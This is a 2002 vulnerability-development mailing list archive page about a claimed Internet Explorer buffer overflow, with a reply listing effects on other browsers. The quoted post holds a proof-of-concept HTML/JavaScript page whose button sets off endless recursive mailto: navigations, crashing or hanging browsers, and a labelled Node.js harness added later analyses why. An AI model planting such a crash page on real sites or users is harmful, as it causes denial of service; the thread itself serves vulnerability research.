Vulnerability Development mailing list archives
Re: Buffer Overflow with all versions of Internet Explorer and Javacript.
From: Scott Mackenzie <smackenz () sdf lonestar org>
Date: 03 Jun 2002 00:47:52 +0100
After a few minutes of testing, it seems this does not only affect Internet Explorer but also the following browsers:

In KDE's Konqueror (latest version) it seg faults the browser instantly.
In Mozilla 0.99 it causes a denial of service situation against the machine, with 100% CPU usage and some crazy hard drive accessing until the process is killed.

Other information:
Netscape 6 series (latest version) does nothing when SMASH! is clicked.
Galeon (latest) tries to mail a rather long email address, but the browser itself is unaffected.

Test System: Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686

---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------

On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
On 28/07/1999 I discovered a stack buffer overflow that so far affects all versions of Internet Explorer. On many Windows 98 machines it makes it necessary to restart the machine since, it seems to me, it is left without memory. It has only been tested on several 5.x versions of IE on Windows NT Server SP6 and Windows 98 Second Edition. As I said before, I had to force a restart of the Windows 98 machine.

Is it possible to execute arbitrary code using the variable company from the example?

// internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
// internet Explorer 5.00.3500.1003 on Windows98se

-----------cut here---------------------------
<html><head></head>
<script language="JAVASCRIPT">
function hacerMail() {
    var company;
    crear();
    address="s0t4ipv6 () shellcode com ar";
    soporte();
}
function soporte(){
    var soporte="bill () mocosoft com";
    window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
    // window.location=company; // also this line causes the bof.
    close(hacerMail());
}
function crear(){
    company="shellcode here?\n"; // i don't think so.
}
</script>
<input type="button" onClick="hacerMail();" value="SMASH!"></input>
</html>
-----------cut here---------------------------

Regards.

- The Internet is harmful to your health -
- Law No. 127.0.0.1

Matias Sedalo
http://www.shellcode.com.ar
s0t4ipv6 () shellcode com ar
B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
.......................................
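Added example, not part of either poster's message: a Node.js harness that mirrors the call structure of the quoted script with a stubbed `window.location`, showing that `hacerMail()` and `soporte()` re-enter each other with no exit condition, so one click keeps issuing `mailto:` navigations until the script engine's stack limit is reached. The names `traceCallGraph` and `fakeWindow` and the `example.invalid` addresses are constructed for this illustration.

```javascript
// Added analysis harness (not from the original post). Runs under Node.js.
// `fakeWindow` and `traceCallGraph` are hypothetical names; the three inner
// functions mirror the call structure of the posted script.
function traceCallGraph() {
  const navigations = [];               // every value assigned to window.location
  const fakeWindow = {
    set location(url) { navigations.push(url); }
  };
  const close = () => {};               // stand-in for window.close(); never reached
  let address, company, maxDepth = 0, depth = 0;

  function crear() { company = "shellcode here?\n"; }

  function soporte() {
    const cc = "bill@example.invalid";  // constructed placeholder address
    fakeWindow.location = "mailto:" + address + "?cc=" + cc + "&subject=" + company;
    close(hacerMail());                 // argument is evaluated first: re-enters hacerMail()
  }

  function hacerMail() {
    depth++;
    if (depth > maxDepth) maxDepth = depth;
    crear();
    address = "user@example.invalid";   // constructed placeholder address
    soporte();
    depth--;                            // never reached: soporte() does not return
  }

  let errorName = null;
  try {
    hacerMail();                        // what the button's onClick does
  } catch (e) {
    errorName = e.name;                 // the engine's stack guard ends the recursion
  }
  return { errorName, maxDepth, navigationCount: navigations.length,
           firstUrlLength: navigations[0].length };
}

const result = traceCallGraph();
console.log(result);
```

The URL built on each pass is short and constant in length; what grows without bound is the number of nested calls and navigation requests.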
Current thread:
- Buffer Overflow with all versions of Internet Explorer and Javacript. Matias Sedalo (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Scott Mackenzie (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Jacek Lach (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. George Staikos (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Nicolas Sigal (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Jacek Lach (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Scott Mackenzie (Jun 02)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Gian Fabio Palmerini (Jun 03)